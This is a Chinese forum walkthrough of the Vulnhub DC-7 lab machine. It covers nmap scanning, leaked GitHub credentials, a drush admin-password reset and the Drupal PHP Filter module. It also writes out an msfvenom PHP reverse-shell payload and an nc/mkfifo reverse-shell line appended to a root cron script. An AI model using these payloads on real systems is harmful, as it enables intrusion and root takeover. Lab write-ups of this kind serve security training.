首页
社区
课程
招聘
[原创]小蜘蛛带你一起学习DC-7
发表于: 2021-3-6 16:12 4411

[原创]小蜘蛛带你一起学习DC-7

2021-3-6 16:12
4411

Vunlnhub靶机DC-7

 

注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。

 

目录
DC-7 靶机实战(DC-)

DC-7 靶机

信息收集

1
nmap -A -sV -O -p- -T4 10.10.10.224

图片描述
访问80端口
图片描述

它告诉我们如果进行暴力破解可能不会成功,在盒子外面,那么我们可以尝试进行社工

 

git源码泄露

在访问80端口可以看到@DC7USER这个商标,我们不妨去github上面看看

 

图片描述

 

图片描述
果然,我们拿到了用户名和密码

 

使用ssh登录账号

1
2
3
ssh dc7user$10.10.10.224
 
dc7user/MdR3xOgB7#dW

ls查看有个mbox邮箱,打开一直在调用/opt/scripts/backups.sh,这是一个定时任务

 

图片描述

这个文件只能由root和www-data才能修改

修改网站admin密码

1
Drush是Drupal的命令行shell和Unix脚本接口。Drush Core附带了许多有用的命令,可用于与模块/主题/配置文件等代码进行交互。

Drush命令可以修改网站后台admin用户的密码,命令:drush user-password admin --password="123"。
注意使用drush命令的时候要先切换到项目根目录,网站源码所在目录,网站目录一般在/var/www/html

 

先进入网站根目录下

1
cd /var/www/html/

修改admin密码

1
drush user-password admin --password="123"

图片描述
登录admin用户
图片描述
可以看到我们进入到了这个用户,我们可以下载一些漏洞插件,然后利用插件
图片描述
下载PHP Filter模块

1
https://www.drupal.org/project/php

图片描述

 

下载完成后将插件勾选并安装
图片描述

 

点击preview,成功看到phpinfo
图片描述
图片描述

然后就可以进入content,选择basic page,选择php code测试下。输入完后点击preview,成功看到phpinfo。

 

图片描述
图片描述

生成木马

那么我们可以生成一个php的反弹shell写进去

1
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f raw

图片描述

将生成的木马拷贝到PHP网页代码中

图片描述

进入msf

msf这边侦听,网页端点击preview
图片描述
图片描述
然后我们就拿到了shell

提权

获取一个交互的shell

1
python -c 'import pty;pty.spawn("/bin/bash")'

在d7user用户发现的backups.sh文件在这里就能够执行了

 

根据之前的mail提示进入到/opt/scripts目录下
backups.sh文件写入反弹shell代码:

1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.128 4444 >/tmp/f" >> backups.sh

kali监听:

1
nc -lvvp 4444

耐心等待大约十分钟,就获得了shell
图片描述
图片描述
图片描述


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2021-3-7 10:44 被安全小蜘蛛编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (2)
雪    币: 1634
活跃值: (480)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
这次监听为啥时间就这么长啊。挺好奇的。
2022-10-26 14:50
0
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
3
这个有时需要看情况了。
2022-10-28 17:44
0
游客
登录 | 注册 方可回帖
返回
//